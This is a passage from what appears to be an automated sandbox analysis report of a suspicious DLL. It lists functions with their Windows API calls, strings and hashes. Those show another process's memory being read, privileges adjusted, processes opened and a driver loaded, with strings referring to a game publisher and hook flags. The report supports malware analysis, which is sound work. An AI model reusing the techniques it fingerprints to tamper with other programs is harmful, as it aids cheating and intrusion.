                                                                                                                                        • Part of subcall function 69EA2510: _memset.LIBCMT ref: 69EA253A
                                                                                                                                        • Part of subcall function 69EA08D0: _memset.LIBCMT ref: 69EA08F6
                                                                                                                                        • Part of subcall function 69EA08D0: _memset.LIBCMT ref: 69EA093A
                                                                                                                                        • Part of subcall function 69EA2440: _memset.LIBCMT ref: 69EA248B
                                                                                                                                        • Part of subcall function 69EA2440: ReadProcessMemory.KERNEL32 ref: 69EA24B9
                                                                                                                                        • Part of subcall function 69EA2440: CloseHandle.KERNEL32(00000000), ref: 69EA24E8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$CloseHandle$MemoryModule32ProcessRead$CreateFirstNextSnapshotToolhelp32
                                                                                                                                      • String ID: Bass.dll$CDClient.dll$Defense.dll$Plug.dll$Wemade Entertainment
                                                                                                                                      • API String ID: 3308528819-2843158820
                                                                                                                                      • Opcode ID: e45ad62814c11c57f4244c5bbddcd136f4d6a6097b8d92ebb3dcd40f4d2bea5e
                                                                                                                                      • Instruction ID: 14e6e65e43737d2d5394348f38532d4e4627ee47109dbed612ebd823bc5b4be4
                                                                                                                                      • Opcode Fuzzy Hash: e45ad62814c11c57f4244c5bbddcd136f4d6a6097b8d92ebb3dcd40f4d2bea5e
                                                                                                                                      • Instruction Fuzzy Hash: 2851D57AA0420417E665D266AD02BAF73DC5F9421DF90903DED0EDA392FB35E218C292
                                                                                                                                      Function 69E84780 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 69E847DE
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E847F7
                                                                                                                                      • OutputDebugStringA.KERNEL32(OpenFileMapping failed,76230F00,?,?,?,?,?,?,?,?,?,?,69E84885,?,00000000,?), ref: 69E84811
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC,?,?,?,?,?,?,?,?,?,?,69E84885,?,00000000,?,?), ref: 69E84818
                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,?,?,?,?,?,69E84885,?,00000000,?), ref: 69E84843
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugFileOutputString$MappingOpenView__wfopen_s
                                                                                                                                      • String ID: C:\pl.txt$OpenFileMapping failed$TH_MAP_DATA
                                                                                                                                      • API String ID: 3806545002-2707373594
                                                                                                                                      • Opcode ID: 6ee7a707276a001f5e363ba63968d0642b7bba49d66e7a228e0c893a38b440b0
                                                                                                                                      • Instruction ID: ae66f6e03286003b01f7c9d587e3276852a8728a52e6cd50f3ea430619539d1d
                                                                                                                                      • Opcode Fuzzy Hash: 6ee7a707276a001f5e363ba63968d0642b7bba49d66e7a228e0c893a38b440b0
                                                                                                                                      • Instruction Fuzzy Hash: 1C216D74A08300AFC740EF28D945B2EB7E5AF8D704F50882EF189D7241EB349508DB83
                                                                                                                                      Function 69E9B9A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll,?), ref: 69E9B9A9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 69E9B9B5
                                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 69E9B9F2
                                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 69E9B9F9
                                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 69E9BA25
                                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 69E9BA2C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$CurrentWow64$AddressLibraryLoadProc
                                                                                                                                      • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                                                                                                      • API String ID: 4086309646-1263206204
                                                                                                                                      • Opcode ID: 4df030592b4c3cc27dca47c41c87e49e717817da17ac4d1b97652d6288300826
                                                                                                                                      • Instruction ID: 81cf269b6ea04462b839cd529654581e6f6a7e7463ec9886c26cd9784e0d451f
                                                                                                                                      • Opcode Fuzzy Hash: 4df030592b4c3cc27dca47c41c87e49e717817da17ac4d1b97652d6288300826
                                                                                                                                      • Instruction Fuzzy Hash: BB112EB1C18361AFC701DF64D90945FBBE5FF89621F898D1EF099C6200E3788649CB92
                                                                                                                                      Function 69E87D70 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 55libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 69E87DA6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlAnsiStringToUnicodeString), ref: 69E87DD1
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlFreeUnicodeString), ref: 69E87DDE
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ZwLoadDriver), ref: 69E87DEB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                      • String ID: RtlAnsiStringToUnicodeString$RtlFreeUnicodeString$ZwLoadDriver$ntdll.dll
                                                                                                                                      • API String ID: 2238633743-3163315820
                                                                                                                                      • Opcode ID: 73ead3fb80ead44ab4402c7d1d1c4b377842950afd933123e7bc583415746a54
                                                                                                                                      • Instruction ID: ec557c6c97d022bac69bd510391574afc370fc2b5215b66de8cf4c173b31d7e4
                                                                                                                                      • Opcode Fuzzy Hash: 73ead3fb80ead44ab4402c7d1d1c4b377842950afd933123e7bc583415746a54
                                                                                                                                      • Instruction Fuzzy Hash: F701F971E00210ABCB01DB6DA94196FB7D4FF89225F90882FF50DC3301DB35980986A2
                                                                                                                                      Function 69EB4F82 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 69EB4F89
                                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,69EB5245,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4F9A
                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4FB8
                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4FEC
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB5058
                                                                                                                                      • _memset.LIBCMT ref: 69EB5077
                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,69E8A83E,?,?,69E8A96D), ref: 69EB5088
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB50A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1891723912-0
                                                                                                                                      • Opcode ID: f5fa28104ffb4ced3f118882684f053b1ff9e1605eee892aa711bc5c360ade9d
                                                                                                                                      • Instruction ID: 2e1f5ac5f5fd749230e47ccd30730d1eaeab1e34e94ce601ba7e9003c052c014
                                                                                                                                      • Opcode Fuzzy Hash: f5fa28104ffb4ced3f118882684f053b1ff9e1605eee892aa711bc5c360ade9d
                                                                                                                                      • Instruction Fuzzy Hash: 2831AB74800606EFDB24DF64DA8495ABBB0FF06324B30C52EE5569B654CB31AA94CBC0
                                                                                                                                      Function 69E9C9D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 271COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E9CC70
                                                                                                                                      • _sprintf.LIBCMT ref: 69E9CC8B
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E9CCA2
                                                                                                                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,76229350,00000000), ref: 69E9CCBB
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC,?,?,?,?,?,?,?,?,?,76229350,00000000), ref: 69E9CCC2
                                                                                                                                      Strings
                                                                                                                                      • UnionZsShareDate nGameType is : %d hotkeyFlag is : %d, hookFlag : %d, xrefs: 69E9CC85
                                                                                                                                      • C:\pl.txt, xrefs: 69E9CC9C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset_sprintf
                                                                                                                                      • String ID: C:\pl.txt$UnionZsShareDate nGameType is : %d hotkeyFlag is : %d, hookFlag : %d
                                                                                                                                      • API String ID: 970810673-172700874
                                                                                                                                      • Opcode ID: 6c4bf47c3fab15d8de63dc45a8eb6b36c7deb637424ccfc044b400d310bea463
                                                                                                                                      • Instruction ID: 74fe8d01bd852aa1dd5d2974e1e1965ab456145bbebaa403a323f0ab7c44f69c
                                                                                                                                      • Opcode Fuzzy Hash: 6c4bf47c3fab15d8de63dc45a8eb6b36c7deb637424ccfc044b400d310bea463
                                                                                                                                      • Instruction Fuzzy Hash: 04A1C3B5914781CBCB20EF28C69465BBBE0BB45708B24D92EE4EF47B01D375E481CB92
                                                                                                                                      Function 69E9AA90 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E9AAF2
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                                      • String ID: %1s
                                                                                                                                      • API String ID: 501242067-3465968173
                                                                                                                                      • Opcode ID: 624f5ac1de0dc7f8ac8e2f2e8cf14ca1883cfb6886e448763756d1c720038073
                                                                                                                                      • Instruction ID: da921f00d9408c05555fe53779e8240cea683619c8be6cb1da313eb658ec69ae
                                                                                                                                      • Opcode Fuzzy Hash: 624f5ac1de0dc7f8ac8e2f2e8cf14ca1883cfb6886e448763756d1c720038073
                                                                                                                                      • Instruction Fuzzy Hash: A261F3B5D583059BC710DF64D981A9F73A9AF85328F20452DE89A8B300FB35D946C7E3
                                                                                                                                      Function 69EB2285 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EB21E5: GetParent.USER32(?), ref: 69EB2239
                                                                                                                                        • Part of subcall function 69EB21E5: GetLastActivePopup.USER32(?), ref: 69EB224A
                                                                                                                                        • Part of subcall function 69EB21E5: IsWindowEnabled.USER32(?), ref: 69EB225E
                                                                                                                                        • Part of subcall function 69EB21E5: EnableWindow.USER32(?,00000000), ref: 69EB2271
                                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 69EB22D2
                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 69EB22E6
                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?), ref: 69EB22F0
                                                                                                                                      • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 69EB2308
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 69EB2382
                                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 69EB23C7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                      • String ID: 0
                                                                                                                                      • API String ID: 1877664794-4108050209
                                                                                                                                      • Opcode ID: c7827edda52f2f2eabac87035db475a0319c39d952d4c57de7cec1410b022e6d
                                                                                                                                      • Instruction ID: 0d77c440dd7fcf9e5916ee2e672ac4b55334fa24954e8371ef0955fa0013a221
                                                                                                                                      • Opcode Fuzzy Hash: c7827edda52f2f2eabac87035db475a0319c39d952d4c57de7cec1410b022e6d
                                                                                                                                      • Instruction Fuzzy Hash: D041C2319002199BDF218F64CE45BDE77B8BF36724F2001A8EA55AB385D770DA868F90
                                                                                                                                      Function 69EA3880 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
